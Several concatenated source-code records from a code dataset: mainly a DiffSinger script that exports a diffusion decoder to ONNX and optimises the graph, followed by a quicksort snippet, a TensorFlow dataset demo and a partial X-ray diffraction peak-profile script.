:return:\n \"\"\"\n x = spec.squeeze(1)\n x = self.input_projection(x) # [B, residual_channel, T]\n\n x = functional.relu(x)\n diffusion_step = diffusion_step.float()\n diffusion_step = self.diffusion_embedding(diffusion_step)\n diffusion_step = self.mlp(diffusion_step)\n\n # Avoid ConstantOfShape op\n x, skip = self.residual_layers[0](x, cond, diffusion_step)\n # noinspection PyTypeChecker\n for layer in self.residual_layers[1:]:\n x, skip_connection = layer.forward(x, cond, diffusion_step)\n skip += skip_connection\n\n x = skip / math.sqrt(len(self.residual_layers))\n\n x = self.skip_projection(x)\n x = functional.relu(x)\n x = self.output_projection(x) # [B, mel_bins, T]\n return x.unsqueeze(1)\n\n\nclass NaiveNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('clip_min', to_torch(-1.))\n self.register_buffer('clip_max', to_torch(1.))\n\n def forward(self, x, noise_pred, t):\n x_recon = (\n extract(self.sqrt_recip_alphas_cumprod, t) * x -\n extract(self.sqrt_recipm1_alphas_cumprod, t) * noise_pred\n )\n x_recon = torch.clamp(x_recon, min=self.clip_min, max=self.clip_max)\n\n model_mean = (\n extract(self.posterior_mean_coef1, t) * x_recon +\n extract(self.posterior_mean_coef2, t) * x\n )\n model_log_variance = extract(self.posterior_log_variance_clipped, t)\n noise = torch.randn_like(x)\n # no noise when t == 0\n nonzero_mask = ((t > 0).float()).reshape(1, 1, 1, 1)\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n\nclass PLMSNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n # Below are buffers for TorchScript to pass jit compilation.\n self.register_buffer('_1', to_torch(1))\n self.register_buffer('_2', to_torch(2))\n self.register_buffer('_3', to_torch(3))\n self.register_buffer('_5', to_torch(5))\n self.register_buffer('_9', to_torch(9))\n self.register_buffer('_12', to_torch(12))\n self.register_buffer('_16', to_torch(16))\n self.register_buffer('_23', to_torch(23))\n self.register_buffer('_24', to_torch(24))\n self.register_buffer('_37', to_torch(37))\n self.register_buffer('_55', 
to_torch(55))\n self.register_buffer('_59', to_torch(59))\n\n def forward(self, x, noise_t, t, t_prev):\n a_t = extract(self.alphas_cumprod, t)\n a_prev = extract(self.alphas_cumprod, t_prev)\n a_t_sq, a_prev_sq = a_t.sqrt(), a_prev.sqrt()\n\n x_delta = (a_prev - a_t) * ((self._1 / (a_t_sq * (a_t_sq + a_prev_sq))) * x - self._1 / (\n a_t_sq * (((self._1 - a_prev) * a_t).sqrt() + ((self._1 - a_t) * a_prev).sqrt())) * noise_t)\n x_pred = x + x_delta\n\n return x_pred\n\n def predict_stage0(self, noise_pred, noise_pred_prev):\n return (noise_pred\n + noise_pred_prev) / self._2\n\n def predict_stage1(self, noise_pred, noise_list):\n return (noise_pred * self._3\n - noise_list[-1]) / self._2\n\n def predict_stage2(self, noise_pred, noise_list):\n return (noise_pred * self._23\n - noise_list[-1] * self._16\n + noise_list[-2] * self._5) / self._12\n\n def predict_stage3(self, noise_pred, noise_list):\n return (noise_pred * self._55\n - noise_list[-1] * self._59\n + noise_list[-2] * self._37\n - noise_list[-3] * self._9) / self._24\n\n\nclass MelExtractor(nn.Module):\n def __init__(self, spec_min, spec_max, keep_bins):\n super().__init__()\n\n def forward(self, x):\n x = x.squeeze(1).permute(0, 2, 1)\n d = (self.spec_max - self.spec_min) / 2\n m = (self.spec_max + self.spec_min) / 2\n return x * d + m\n\n\nclass GaussianDiffusion(nn.Module):\n def __init__(self, out_dims, timesteps=1000, k_step=1000, spec_min=None, spec_max=None):\n super().__init__()\n self.mel_bins = out_dims\n self.K_step = k_step\n\n self.denoise_fn = DiffNet(out_dims)\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n if 'schedule_type' in hparams.keys():\n betas = beta_schedule[hparams['schedule_type']](timesteps)\n else:\n betas = cosine_beta_schedule(timesteps)\n\n # Below are buffers for state_dict to load into.\n alphas = 1. - betas\n alphas_cumprod = np.cumprod(alphas, axis=0)\n alphas_cumprod_prev = np.append(1., alphas_cumprod[:-1])\n\n timesteps, = betas.shape\n self.num_timesteps = int(timesteps)\n\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('alphas_cumprod', to_torch(alphas_cumprod))\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod)))\n self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod - 1)))\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n posterior_variance = betas * (1. - alphas_cumprod_prev) / (1. - alphas_cumprod)\n # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)\n # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain\n self.register_buffer('posterior_log_variance_clipped', to_torch(np.log(np.maximum(posterior_variance, 1e-20))))\n self.register_buffer('posterior_mean_coef1', to_torch(\n betas * np.sqrt(alphas_cumprod_prev) / (1. - alphas_cumprod)))\n self.register_buffer('posterior_mean_coef2', to_torch(\n (1. - alphas_cumprod_prev) * np.sqrt(alphas) / (1. 
- alphas_cumprod)))\n\n self.register_buffer('spec_min', torch.FloatTensor(spec_min)[None, None, :hparams['keep_bins']])\n self.register_buffer('spec_max', torch.FloatTensor(spec_max)[None, None, :hparams['keep_bins']])\n\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n def build_submodules(self):\n # Move registered buffers into submodules after loading state dict.\n self.naive_noise_predictor.register_buffer('sqrt_recip_alphas_cumprod', self.sqrt_recip_alphas_cumprod)\n self.naive_noise_predictor.register_buffer('sqrt_recipm1_alphas_cumprod', self.sqrt_recipm1_alphas_cumprod)\n self.naive_noise_predictor.register_buffer(\n 'posterior_log_variance_clipped', self.posterior_log_variance_clipped)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef1', self.posterior_mean_coef1)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef2', self.posterior_mean_coef2)\n self.plms_noise_predictor.register_buffer('alphas_cumprod', self.alphas_cumprod)\n self.mel_extractor.register_buffer('spec_min', self.spec_min)\n self.mel_extractor.register_buffer('spec_max', self.spec_max)\n del self.sqrt_recip_alphas_cumprod\n del self.sqrt_recipm1_alphas_cumprod\n del self.posterior_log_variance_clipped\n del self.posterior_mean_coef1\n del self.posterior_mean_coef2\n del self.alphas_cumprod\n del self.spec_min\n del self.spec_max\n\n def forward(self, condition, speedup):\n device = condition.device\n condition = condition.transpose(1, 2) # (1, n_frames, 256) => (1, 256, n_frames)\n\n n_frames = condition.shape[2]\n step_range = torch.arange(0, self.K_step, speedup, dtype=torch.long, device=device).flip(0)\n x = torch.randn((1, 1, self.mel_bins, n_frames), device=device)\n\n if speedup > 1:\n plms_noise_stage = torch.tensor(0, dtype=torch.long, device=device)\n noise_list = torch.zeros((0, 1, 1, self.mel_bins, n_frames), device=device)\n for t in step_range:\n noise_pred = self.denoise_fn(x, t, condition)\n t_prev = t - speedup\n t_prev = t_prev * (t_prev > 0)\n\n if plms_noise_stage == 0:\n x_pred = self.plms_noise_predictor(x, noise_pred, t, t_prev)\n noise_pred_prev = self.denoise_fn(x_pred, t_prev, condition)\n noise_pred_prime = self.plms_noise_predictor.predict_stage0(noise_pred, noise_pred_prev)\n elif plms_noise_stage == 1:\n noise_pred_prime = self.plms_noise_predictor.predict_stage1(noise_pred, noise_list)\n elif plms_noise_stage == 2:\n noise_pred_prime = self.plms_noise_predictor.predict_stage2(noise_pred, noise_list)\n else:\n noise_pred_prime = self.plms_noise_predictor.predict_stage3(noise_pred, noise_list)\n\n noise_pred = noise_pred.unsqueeze(0)\n if plms_noise_stage < 3:\n noise_list = torch.cat((noise_list, noise_pred), dim=0)\n plms_noise_stage = plms_noise_stage + 1\n else:\n noise_list = torch.cat((noise_list[-2:], noise_pred), dim=0)\n\n x = self.plms_noise_predictor(x, noise_pred_prime, t, t_prev)\n\n # from dpm_solver import NoiseScheduleVP, model_wrapper, DpmSolver\n # ## 1. Define the noise schedule.\n # noise_schedule = NoiseScheduleVP(betas=self.betas)\n #\n # ## 2. Convert your discrete-time `model` to the continuous-time\n # # noise prediction model. Here is an example for a diffusion model\n # ## `model` with the noise prediction type (\"noise\") .\n #\n # model_fn = model_wrapper(\n # self.denoise_fn,\n # noise_schedule,\n # model_kwargs={\"cond\": condition}\n # )\n #\n # ## 3. 
Define dpm-solver and sample by singlestep DPM-Solver.\n # ## (We recommend singlestep DPM-Solver for unconditional sampling)\n # ## You can adjust the `steps` to balance the computation\n # ## costs and the sample quality.\n # dpm_solver = DpmSolver(model_fn, noise_schedule)\n #\n # steps = t // hparams[\"pndm_speedup\"]\n # x = dpm_solver.sample(x, steps=steps)\n else:\n for t in step_range:\n pred = self.denoise_fn(x, t, condition)\n x = self.naive_noise_predictor(x, pred, t)\n\n mel = self.mel_extractor(x)\n return mel\n\n\nclass DiffDecoder(nn.Module):\n def __init__(self, device):\n super().__init__()\n self.model = build_model()\n self.model.eval()\n self.model.to(device)\n\n def forward(self, condition, speedup):\n mel = self.model.forward(condition, speedup) # (1, n_frames, mel_bins)\n return mel\n\n\ndef build_model():\n model = GaussianDiffusion(\n out_dims=hparams['audio_num_mel_bins'],\n timesteps=hparams['timesteps'],\n k_step=hparams['K_step'],\n spec_min=hparams['spec_min'],\n spec_max=hparams['spec_max'],\n )\n model.eval()\n load_ckpt(model, hparams['work_dir'], 'model', strict=False)\n model.build_submodules()\n return model\n\n\ndef _fix_cast_nodes(graph, logs=None):\n if logs is None:\n logs = []\n for sub_node in graph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(branch, logs)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(body, logs)\n elif sub_node.op_type == 'Cast':\n for i, sub_attr in enumerate(sub_node.attribute):\n if sub_attr.name == 'to':\n to = onnx.helper.get_attribute_value(sub_attr)\n if to == onnx.TensorProto.DOUBLE:\n float32 = onnx.helper.make_attribute('to', onnx.TensorProto.FLOAT)\n sub_node.attribute.remove(sub_attr)\n sub_node.attribute.insert(i, float32)\n logs.append(sub_node.name)\n break\n return logs\n\n\ndef _fold_shape_gather_equal_if_to_squeeze(graph, subgraph, logs=None):\n if logs is None:\n logs = []\n\n # Do folding in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, branch, logs)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, body, logs)\n\n # Do folding in current graph.\n i_shape = 0\n while i_shape < len(subgraph.node):\n if subgraph.node[i_shape].op_type == 'Shape':\n shape_node = subgraph.node[i_shape]\n shape_out = shape_node.output[0]\n i_gather = i_shape + 1\n while i_gather < len(subgraph.node):\n if subgraph.node[i_gather].op_type == 'Gather' and subgraph.node[i_gather].input[0] == shape_out:\n gather_node = subgraph.node[i_gather]\n gather_out = gather_node.output[0]\n i_equal = i_gather + 1\n while i_equal < len(subgraph.node):\n if subgraph.node[i_equal].op_type == 'Equal' and (\n subgraph.node[i_equal].input[0] == gather_out\n or subgraph.node[i_equal].input[1] == gather_out):\n equal_node = subgraph.node[i_equal]\n equal_out = equal_node.output[0]\n i_if = i_equal + 1\n while i_if < len(subgraph.node):\n if subgraph.node[i_if].op_type == 'If' and subgraph.node[i_if].input[0] == equal_out:\n # Found the substructure to be folded.\n if_node = subgraph.node[i_if]\n # Search and clean initializer values.\n squeeze_axes_tensor = None\n 
for tensor in subgraph.initializer:\n if tensor.name == gather_node.input[1]:\n squeeze_axes_tensor = tensor\n subgraph.initializer.remove(tensor)\n elif tensor.name == equal_node.input[1]:\n subgraph.initializer.remove(tensor)\n # Create 'Squeeze' node.\n squeeze_node = onnx.helper.make_node(\n op_type='Squeeze',\n inputs=shape_node.input,\n outputs=if_node.output\n )\n squeeze_axes = onnx.helper.make_attribute(\n key='axes',\n value=[struct.unpack('q', squeeze_axes_tensor.raw_data)[0]] # unpack int64\n )\n squeeze_node.attribute.extend([squeeze_axes])\n # Replace 'Shape', 'Gather', 'Equal', 'If' with 'Squeeze'.\n subgraph.node.insert(i_shape, squeeze_node)\n subgraph.node.remove(shape_node)\n subgraph.node.remove(gather_node)\n subgraph.node.remove(equal_node)\n subgraph.node.remove(if_node)\n logs.append((shape_node.name, gather_node.name, equal_node.name, if_node.name))\n break\n i_if += 1\n else:\n break\n i_equal += 1\n else:\n break\n i_gather += 1\n else:\n break\n i_shape += 1\n return logs\n\n\ndef _extract_conv_nodes(graph, weight_pattern, alias_prefix):\n node_dict = {} # key: pattern match, value: (alias, node)\n logs = []\n\n def _extract_conv_nodes_recursive(subgraph):\n to_be_removed = []\n for sub_node in subgraph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(branch)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(body)\n elif sub_node.op_type == 'Conv' and re.match(weight_pattern, sub_node.input[1]):\n # Found node to extract\n cached = node_dict.get(sub_node.input[1])\n if cached is None:\n out_alias = f'{alias_prefix}.{len(node_dict)}'\n node_dict[sub_node.input[1]] = (out_alias, sub_node)\n else:\n out_alias = cached[0]\n out = sub_node.output[0]\n # Search for nodes downstream the extracted node and match them to the renamed output\n for dep_node in subgraph.node:\n for dep_idx, dep_input in enumerate(dep_node.input):\n if dep_input == out:\n dep_node.input.remove(out)\n dep_node.input.insert(dep_idx, out_alias)\n # Add the node to the remove list\n to_be_removed.append(sub_node)\n logs.append(sub_node.name)\n [subgraph.node.remove(_n) for _n in to_be_removed]\n\n for i, n in enumerate(graph.node):\n if n.op_type == 'If':\n for a in n.attribute:\n b = onnx.helper.get_attribute_value(a)\n _extract_conv_nodes_recursive(b)\n for key in reversed(node_dict):\n alias, node = node_dict[key]\n # Rename output of the node\n out_name = node.output[0]\n node.output.remove(node.output[0])\n node.output.insert(0, alias)\n # Insert node into the main graph\n graph.node.insert(i, node)\n # Rename value info of the output\n for v in graph.value_info:\n if v.name == out_name:\n v.name = alias\n break\n break\n return logs\n\n\ndef _remove_unused_values(graph):\n used_values = set()\n cleaned_values = []\n\n def _record_usage_recursive(subgraph):\n for node in subgraph.node:\n # For 'If' and 'Loop' nodes, do recording recursively\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(body)\n # For each node, record its inputs and outputs\n for input_value in node.input:\n used_values.add(input_value)\n for 
output_value in node.output:\n used_values.add(output_value)\n\n def _clean_unused_recursively(subgraph):\n # Do cleaning in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(body)\n\n # Do cleaning in current graph.\n i = 0\n while i < len(subgraph.initializer):\n if subgraph.initializer[i].name not in used_values:\n cleaned_values.append(subgraph.initializer[i].name)\n subgraph.initializer.remove(subgraph.initializer[i])\n else:\n i += 1\n i = 0\n while i < len(subgraph.value_info):\n if subgraph.value_info[i].name not in used_values:\n cleaned_values.append(subgraph.value_info[i].name)\n subgraph.value_info.remove(subgraph.value_info[i])\n else:\n i += 1\n\n _record_usage_recursive(graph)\n _clean_unused_recursively(graph)\n return cleaned_values\n\n\ndef fix(src, target):\n model = onnx.load(src)\n\n # The output dimension are wrongly hinted by TorchScript\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n out_dims.remove(out_dims[1])\n out_dims.insert(1, in_dims[1])\n print(f'| annotate output: \\'{model.graph.output[0].name}\\'')\n\n # Fix 'Cast' nodes in sub-graphs that wrongly cast tensors to float64\n fixed_casts = _fix_cast_nodes(model.graph)\n print('| fix node(s): ')\n for i, log in enumerate(fixed_casts):\n if i == len(fixed_casts) - 1:\n end = '\\n'\n elif i % 10 == 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #1 of the simplifier to fix missing value info and type hints and remove unnecessary 'Cast'.\n print('Running ONNX simplifier...')\n model, check = onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n\n then_branch = None\n for node in model.graph.node:\n if node.op_type == 'If':\n # Add type hint to let the simplifier fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze'\n if_out = node.output[0]\n for info in model.graph.value_info:\n if info.name == if_out:\n if_out_dim = info.type.tensor_type.shape.dim\n while len(if_out_dim) > 0:\n if_out_dim.remove(if_out_dim[0])\n if_out_dim.insert(0, in_dims[0]) # batch_size\n if_out_dim.insert(1, in_dims[0]) # 1\n if_out_dim.insert(2, out_dims[2]) # mel_bins\n if_out_dim.insert(3, in_dims[1]) # n_frames\n print(f'| annotate node: \\'{node.name}\\'')\n\n # Manually fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze' in sub-graphs\n folded_groups = []\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n folded_groups += _fold_shape_gather_equal_if_to_squeeze(model.graph, branch)\n if attr.name == 'then_branch':\n # Save branch for future use\n then_branch = branch\n print('| fold node group(s): ')\n print(', '.join(['[' + ', '.join([f'\\'{n}\\'' for n in log]) + ']' for log in folded_groups]))\n break\n\n # Optimize 'Concat' nodes for shapes\n concat_node = None\n shape_prefix_name = 'noise.shape.prefix'\n list_length_name = 'list.length'\n for node in model.graph.node:\n if node.op_type == 'Concat':\n concat_node = node\n for i, ini in enumerate(model.graph.initializer):\n if ini.name == node.input[0]:\n shape_prefix 
= onnx.helper.make_tensor(\n name=shape_prefix_name,\n data_type=onnx.TensorProto.INT64,\n dims=(3,),\n vals=[out_dims[0].dim_value, 1, out_dims[2].dim_value]\n )\n list_length = onnx.helper.make_tensor(\n name=list_length_name,\n data_type=onnx.TensorProto.INT64,\n dims=(1,),\n vals=[0]\n )\n model.graph.initializer.extend([shape_prefix, list_length])\n break\n for i in range(3):\n node.input.remove(node.input[0])\n node.input.insert(0, shape_prefix_name)\n print(f'| optimize node: \\'{node.name}\\'')\n break\n for node in then_branch.node:\n if node.op_type == 'Concat':\n concat_inputs = list(node.input)\n dep_nodes = []\n for dep_node in then_branch.node:\n if dep_node.op_type == 'Unsqueeze' and dep_node.output[0] in concat_inputs:\n dep_nodes.append(dep_node)\n [then_branch.node.remove(d_n) for d_n in dep_nodes]\n while len(node.input) > 0:\n node.input.remove(node.input[0])\n node.input.extend([list_length_name, concat_node.output[0]])\n print(f'| optimize node: \\'{node.name}\\'')\n break\n\n # Extract 'Conv' nodes and cache results of conditioner projection\n # of each residual layer from loop bodies to improve performance.\n extracted_convs = _extract_conv_nodes(\n model.graph,\n r'model\\.denoise_fn\\.residual_layers\\.\\d+\\.conditioner_projection\\.weight',\n 'cache'\n )\n\n print(f'| extract node(s):')\n for i, log in enumerate(extracted_convs):\n if i == len(extracted_convs) - 1:\n end = '\\n'\n elif i % 10 == 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Remove unused initializers and value infos\n cleaned_values = _remove_unused_values(model.graph)\n print(f'| clean value(s):')\n for i, log in enumerate(cleaned_values):\n if i == len(cleaned_values) - 1:\n end = '\\n'\n elif i % 15 == 14:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #2 of the simplifier to further optimize the graph and reduce dangling sub-graphs.\n print('Running ONNX simplifier...')\n model, check = onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n onnx.save(model, target)\n print('Graph fixed and optimized.')\n\n\ndef export(model_path):\n set_hparams(print_hparams=False)\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n decoder = DiffDecoder(device)\n n_frames = 10\n\n with torch.no_grad():\n shape = (1, 1, hparams['audio_num_mel_bins'], n_frames)\n noise_t = torch.randn(shape, device=device)\n noise_list = torch.randn((3, *shape), device=device)\n condition = torch.rand((1, hparams['hidden_size'], n_frames), device=device)\n step = (torch.rand((), device=device) * hparams['K_step']).long()\n speedup = (torch.rand((), device=device) * step / 10.).long()\n step_prev = torch.maximum(step - speedup, torch.tensor(0, dtype=torch.long, device=device))\n\n print('Tracing modules...')\n decoder.model.denoise_fn = torch.jit.trace(\n decoder.model.denoise_fn,\n (\n noise_t,\n step,\n condition\n )\n )\n decoder.model.naive_noise_predictor = torch.jit.trace(\n decoder.model.naive_noise_predictor,\n (\n noise_t,\n noise_t,\n step\n ),\n check_trace=False\n )\n decoder.model.plms_noise_predictor = torch.jit.trace_module(\n decoder.model.plms_noise_predictor,\n {\n 'forward': (\n noise_t,\n noise_t,\n step,\n step_prev\n ),\n 'predict_stage0': (\n noise_t,\n noise_t\n ),\n 'predict_stage1': (\n noise_t,\n noise_list\n ),\n 'predict_stage2': (\n noise_t,\n noise_list\n ),\n 'predict_stage3': (\n noise_t,\n noise_list\n ),\n }\n )\n decoder.model.mel_extractor = torch.jit.trace(\n 
decoder.model.mel_extractor,\n (\n noise_t\n )\n )\n\n decoder = torch.jit.script(decoder)\n condition = torch.rand((1, n_frames, hparams['hidden_size']), device=device)\n speedup = torch.tensor(10, dtype=torch.long, device=device)\n dummy = decoder.forward(condition, speedup)\n\n torch.onnx.export(\n decoder,\n (\n condition,\n speedup\n ),\n model_path,\n input_names=[\n 'condition',\n 'speedup'\n ],\n output_names=[\n 'mel'\n ],\n dynamic_axes={\n 'condition': {\n 1: 'n_frames'\n }\n },\n opset_version=11,\n example_outputs=(\n dummy\n )\n )\n print('PyTorch ONNX export finished.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Export diffusion decoder to ONNX')\n parser.add_argument('--exp', type=str, required=True, help='Experiment to export')\n parser.add_argument('--target', required=False, type=str, help='Path of the target ONNX model')\n args = parser.parse_args()\n\n cwd = os.getcwd()\n if args.target:\n target = os.path.join(cwd, args.target)\n else:\n target = None\n os.chdir(root_dir)\n exp = args.exp\n sys.argv = [\n 'inference/ds_cascade.py',\n '--config',\n f'checkpoints/{exp}/config.yaml',\n '--exp_name',\n exp\n ]\n\n path = f'onnx/assets/{exp}.onnx' if not target else target\n export(path)\n fix(path, path)\n\n os.chdir(cwd)\n if args.target:\n log_path = os.path.abspath(args.target)\n else:\n log_path = path\n print(f'| export \\'model\\' to \\'{log_path}\\'.')\n","repo_name":"kongjian123/DiffSinger","sub_path":"onnx/export/export_diff_decoder.py","file_name":"export_diff_decoder.py","file_ext":"py","file_size_in_byte":36468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40662857949","text":"def qsort(a, start, end):\n \"\"\" quicksort in O(nlogn), no extra memory, in-place\"\"\"\n if start < end:\n p = choosepivot(start, end)\n if p != start:\n a[p], a[start] = a[start], a[p]\n equal = partition(a, start, end)\n qsort(a, start, equal-1)\n qsort(a, equal+1, end)\ndef partition(a, l, r):\n pivot, i = a[l], l+1\n for j in range(l+1, r+1):\n if a[j] <= pivot:\n a[i],a[j] = a[j],a[i]\n i += 1\n # swap pivot to its correct place\n a[l], a[i-1] = a[i-1], a[l]\n return i-1\ndef choosepivot(s, e):\n return randint(s,e)","repo_name":"bdlm-dev/Competitive-Programming-Codebook","sub_path":"content/flow/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71570507848","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nX = tf.constant([2013, 2014, 2015, 2016, 2017])\nY = tf.constant([12000, 14000, 15000, 16500, 17500])\n\ndataset = tf.data.Dataset.from_tensor_slices((X, Y))\n\nfor x, y in dataset:\n print(x.numpy(), y.numpy())\n\n(trainData, trainLabel), (_, _) = tf.keras.datasets.mnist.load_data()\n\ntrainData = np.expand_dims(trainData.astype(np.float32) / 255.0, axis=-1)\nmnist_dataset = tf.data.Dataset.from_tensor_slices((trainData, trainLabel))\n\nfor image, label in mnist_dataset:\n plt.title(label.numpy())\n plt.imshow(image.numpy()[:, :, 0])\n plt.show()\n break\n\n\n# Map\ndef rot90(ima, lab):\n ima = tf.image.rot90(ima)\n return ima, lab\n\n\nmnist_dataset = mnist_dataset.map(rot90)\n\n# Shuffle\n\n# Batch\nmnist_dataset = mnist_dataset.batch(4)\nfor images, labels in mnist_dataset:\n fig, axs = plt.subplots(1, 4)\n for i in range(4):\n axs[i].set_title(labels.numpy()[i])\n axs[i].imshow(images.numpy()[i, :, :, 
0])\n plt.show()\n break;\n\n# Repeat\n\n# Reduce\n\n# Take\n","repo_name":"xin-pu/TFLearning","sub_path":"BasciTF/Data/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2887688104","text":"#!/usr/bin/env python3\nfrom __future__ import absolute_import, division, print_function\nimport iotbx.pdb\nimport iotbx.mrcfile\nfrom scitbx.array_family import flex\nfrom cctbx.development import random_structure\nfrom cctbx import sgtbx\nfrom cctbx import maptbx\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import randrange\nfrom multiprocessing import Pool\nimport time\nfrom scipy.stats import truncnorm\n\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\n\nlambd = 1.540596\n\ndef fwhm(peak, lh = 10*0.437, Lam = 1.540596):\n Rad2 = 360 / np.pi\n return lh / 10**3 / Lam * np.tan(peak / Rad2) * Rad2\n\ndef LP_Factor(Th2, CeV = 0):\n Deg = np.pi / 180\n A = np.cos(CeV*Deg)**2\n return (1 + A * np.cos(Th2*Deg) ** 2) / (1 + A) / np.sin(Th2*Deg)\n\ndef lorenz(Th2, peak, peak_i):\n return (2 / np.pi / fwhm(peak_i)) / (1 + 4 * (Th2 - peak)**2 / fwhm(peak_i)**2)\n\ndef h(phi, peak):\n return L*np.sqrt(np.cos(phi*np.pi/180)**2/np.cos(peak*np.pi/180)**2 - 1)\ndef phi_min(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H+S)/L)**2 + 1 ))\ndef phi_infl(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H-S)/L)**2 + 1 ))\ndef W(phi, peak):\n if phi < phi_min(peak):\n return 0\n if phi_min(peak) <= phi <= phi_infl(peak):\n return H + S - h(phi, peak)\n if phi_infl(peak) <= phi <= peak:\n return 2*min(H, S)\n if phi > peak:\n return 0\n\ndef W2(phis, peak):\n result = np.zeros(len(phis))\n cond1 = (phi_min(peak) <= phis) & (phis <= phi_infl(peak))\n result[cond1] = H + S - h(phis[cond1], peak)\n cond2 = (phis > phi_infl(peak)) & (phis <= peak)\n result[cond2] = 2 * min(H, S)\n return result\n\ndef pool_peaks(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 20\n elif peak < 30:\n N_gauss = 14\n elif peak < 70:\n N_gauss = 7\n else:\n N_gauss = 4\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 0\n for phi in theta2[a:b]:\n # print(deltan)\n if phi == theta2[peak_index]:\n xn, wn = np.polynomial.legendre.leggauss(20)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n sum1 = np.sum(wn*W2(deltan, peak)*lorenz(phi, deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n\ndef pool_peaks2(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 30\n elif peak < 